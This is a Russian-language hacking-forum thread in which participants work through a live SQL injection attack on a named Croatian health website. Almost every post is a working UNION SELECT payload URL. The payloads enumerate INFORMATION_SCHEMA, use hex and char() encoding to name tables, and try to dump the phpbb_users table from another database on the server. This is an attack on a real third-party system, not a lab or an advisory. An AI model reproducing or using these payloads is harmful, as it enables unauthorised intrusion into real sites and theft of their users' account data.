|
sql выдает ошибку
_http://www.zdravlje.hr/clanak.php?id=m-72+union+select+1,table_name,3+from+INFORMATION_SC HEMA.TABLES/*
есть такой скуль. там выводит таблицу phpbb, и так я знаю впринципе что он там есть, но приобращении. http://www.zdravlje.hr/clanak.php?id=m-72+union+select+1,2,3+from+phpbb/* или же _http://www.zdravlje.hr/anketa.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11+from+phpbb/* выдает ошибку |
13 столбцов.
|
Где именно что то я не очень понял
|
Код:
http://www.zdravlje.hr/clanak.php?id=-12909+union+select+1,2,3,4,5,6,7,8,9,10,table_name,12,13+from+INFORMATION_SCHEMA.TABLES+limit+7,1/* |
Это я и так знал... я не про это спрашивал... при обращении phpbb_users ошибку выдает
|
Ищи, в какой БД таблица лежит
|
Код:
http://www.zdravlje.hr/anketa.php?id=-1+union+select+1,2,3,table_name,5,6,7,8,9,10,11+from+INFORMATION_SCHEMA.TABLES+limit+16,1/*Код:
http://www.zdravlje.hr/anketa.php?id=-1+union+select+1,2,3,имя_столбца,5,6,7,8,9,10,11+from+имя_таблицы/* |
Код:
http://www.zdravlje.hr/clanak.php?id=-12909+union+select+1,2,3,4,5,6,7,8,9,10,table_name,12,13+from+information_schema.tables+where+table_name=char(0x50,0x48,0x50,0x42,0x42,0x5f,0x55,0x53,0x45,0x52,0x53)/*Код:
http://www.zdravlje.hr/clanak.php?id=-12909+union+select+1,2,3,4,5,6,7,8,9,10,table_schema,12,13+from+information_schema.tables+where+table_name=char(0x50,0x48,0x50,0x42,0x42,0x5f,0x55,0x53,0x45,0x52,0x53)/*Однако, Код:
http://www.zdravlje.hr/clanak.php?id=-12909+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13+from+beracivi.phpbb_users/* |
Видимо текущему MySQL юзеру запрещен доступ к БД beracivi
|
Код:
http://www.zdravlje.hr/clanak.php?id=-12909+union+select+concat(table_schema,char(46),table_name),2,3,4,5,6,7,8,9,10,11,12,13+from+INFORMATION_SCHEMA.TABLES+where+table_name=0x70687062625f7573657273+limit+22,1/* |
| Время: 17:46 |